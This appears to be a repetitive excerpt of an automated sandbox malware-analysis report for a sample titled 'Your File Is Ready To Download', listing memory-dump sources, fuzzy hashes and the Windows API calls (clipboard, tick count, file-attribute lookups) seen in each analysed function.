                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: a309be330ca9334b05823b44ec4742211a3c56bfaf2c82f09ef315cb6cf1febd
                                                                                                                                                                                                                          • Instruction ID: 2c171e70729c36c72c5bff54c048136c0d29415413b62255bbfc73cea0b5ef39
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a309be330ca9334b05823b44ec4742211a3c56bfaf2c82f09ef315cb6cf1febd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6A12A32605B408AEB6B8B26A8843EA77A1F78DBD4F544116EF5947AF5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: a7cca2c252c93e3aa9b7d8d848247703cda9506bc1b77ecf7367d3cbc826fe27
                                                                                                                                                                                                                          • Instruction ID: ee8894d38df8eb54cf3a14c1f72ed7a2ec911b4a6b8309ed2c63368afb02bca9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7cca2c252c93e3aa9b7d8d848247703cda9506bc1b77ecf7367d3cbc826fe27
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2A16D32601B8085FB6B8B2AE8443EA77A1FB4DBE4F544215EF5A476F5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 28c4f5d343f3a8596afdbbb28552e9644440dad148f2d06cb6c1df15be16f5df
                                                                                                                                                                                                                          • Instruction ID: 421236e7e0f019e6a0e37e8d755665b7293354c93a9a77f8b0f47f85c12fbf72
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28c4f5d343f3a8596afdbbb28552e9644440dad148f2d06cb6c1df15be16f5df
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95A13B32605B408AEB6B8B26E8843EA77A1F78DBD4F544116EF9947BF5DB38C485C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 130734711-0
                                                                                                                                                                                                                          • Opcode ID: 0dcf5ea3c63da5708149ac03f797763fd15c22fd54ce0b7ffe93f93eeff76ba6
                                                                                                                                                                                                                          • Instruction ID: d1e73206e0052a3ffdf35ec5addd437243aa3856fcba2173ed7d06034429a506
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0dcf5ea3c63da5708149ac03f797763fd15c22fd54ce0b7ffe93f93eeff76ba6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1A15931604B4086FB6B8B2BE8543EA67A2F78DBD4F544116FB5947AF6DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 8e8dbd734feb23d6ff0dcbc09d08d8c4d988a3d477a099b7933ee9c0ec697311
                                                                                                                                                                                                                          • Instruction ID: 39badc74fa4f91a4bc73c4a35219e47850ed66246964b97c573de9284211751c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e8dbd734feb23d6ff0dcbc09d08d8c4d988a3d477a099b7933ee9c0ec697311
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19A12931605B408AEB6B8B26E8843EA77A1F78DBD4F544216EF5947BF5DB38C485C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 00fc2304d229a3032f049def107d4e6cc6f5c3b42ca53d7b5ab05cd9c98edb10
                                                                                                                                                                                                                          • Instruction ID: bed8c28f9f296cbb1d67ccc1dc5083405c51ed8b04b031b0fa804075a83e5092
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00fc2304d229a3032f049def107d4e6cc6f5c3b42ca53d7b5ab05cd9c98edb10
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AA12A31605B408AEB6B8B26E8843EA77A1F74DBD4F544116EF5947BF5DB38C485C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 130734711-0
                                                                                                                                                                                                                          • Opcode ID: 54d0b1db7bffe2e0cd29d103faed9f68c3fafdcf8c14e3113f540463e6cc8ad6
                                                                                                                                                                                                                          • Instruction ID: 4aa8d6cad3e8e025e5e5d240b85dbf95f0ee42f256678761492fc8c76976d56e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54d0b1db7bffe2e0cd29d103faed9f68c3fafdcf8c14e3113f540463e6cc8ad6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AA14D31604B4086FB6B8B27E8443DA77A2F78DBE4F548215EB99476F5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 1ffc8ea5225fa0c41bae7347a047f40202f63e74b51d7090873bfd12d0df613c
                                                                                                                                                                                                                          • Instruction ID: cb26c9610103a84e913e711e836586210fde9999bcd78beaf9ec505941a5f9af
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ffc8ea5225fa0c41bae7347a047f40202f63e74b51d7090873bfd12d0df613c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29915A31604B408AFB6B8B27A8443EA77A2F78DBD4F544116FB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 0ce58c75bbe04b905a06aeed021ed09ecec8e92b4c90749eecc88ecb75f3748a
                                                                                                                                                                                                                          • Instruction ID: 97e4ff4785ac50c19b6896ce58c0ef1cf1a3e0cdbb4e699bad28e3ed79c10317
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ce58c75bbe04b905a06aeed021ed09ecec8e92b4c90749eecc88ecb75f3748a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F915B31604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5987AF5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: f80169d563adbaea3e3cf83213dd5a6b89404a6ca147df97d5a9a2034419e818
                                                                                                                                                                                                                          • Instruction ID: 5099e202afadc46a452fbdd17e35c61f2b59f7ddcdd30510c425b883bf64700d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f80169d563adbaea3e3cf83213dd5a6b89404a6ca147df97d5a9a2034419e818
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E914A31604B408AFB6B8B27A8443EA77A2B78DBD4F544116FB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0000000140080A40: GetFullPathNameW.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080A7C
                                                                                                                                                                                                                            • Part of subcall function 0000000140080A40: GetFullPathNameW.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080AC1
                                                                                                                                                                                                                            • Part of subcall function 0000000140080A40: GetFileAttributesW.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080AF9
                                                                                                                                                                                                                            • Part of subcall function 0000000140080A40: GetFileAttributesW.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080B35
                                                                                                                                                                                                                            • Part of subcall function 0000000140080A40: FindFirstFileW.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080B76
                                                                                                                                                                                                                            • Part of subcall function 0000000140080A40: GetLastError.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080B85
                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32 ref: 0000000140031FF1
                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0000000140031FFE
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0000000140032011
                                                                                                                                                                                                                          • PeekMessageW.USER32 ref: 0000000140032045
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0000000140032059
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0000000140032127
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountFileTick$AttributesFullNamePath$ClipboardCloseErrorFindFirstGlobalLastMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3916726430-0
                                                                                                                                                                                                                          • Opcode ID: 8a6a50b7d653cc71d262e5e5cf81e4392e1ff8df1731e7381873aed8753e1e0e
                                                                                                                                                                                                                          • Instruction ID: 5c9f389f4de825d9878a32ea04cf4a77650ad829795e2768e3d97d42a5181c46
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a6a50b7d653cc71d262e5e5cf81e4392e1ff8df1731e7381873aed8753e1e0e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF914831604B4086FB6B8B27E8543EA77A2F78DBD4F544116EB5A87AF5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 53115dc2f6055d8bf11e2698de0baaf7388d09995e6b2621ae8597dd8afe4414
                                                                                                                                                                                                                          • Instruction ID: 98e21afc365e414883ed4f26097a1f7e797a4aa5238aaba5745ba577ee77ce72
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53115dc2f6055d8bf11e2698de0baaf7388d09995e6b2621ae8597dd8afe4414
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A914831600B4086FB6B8B27A8443EA67A2E78DBD4F544116EB5947AF6DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseDirectoryGlobalMessagePeekRemoveUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1863380684-0
                                                                                                                                                                                                                          • Opcode ID: b7ed998e9cf5bbaa42163194383001ed15e42097439c6ec71cfe868c951cd7ec
                                                                                                                                                                                                                          • Instruction ID: 403bce549ffaadd3b96ec6fac61f3b6c643744719f12cf57c0f3a7dd73ca13d0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7ed998e9cf5bbaa42163194383001ed15e42097439c6ec71cfe868c951cd7ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D915931604B4086FB6B8B27A8443EA77A2B78DBD4F544116FB5987AF6DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$RectWindow$ClientClipboardCloseGlobalMessageParentPeekScreenUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1625120959-0
                                                                                                                                                                                                                          • Opcode ID: c8a7ee879b48b2ec7b0480daebcb0192a30f2a69fd74caba8c10a8c3583dfb64
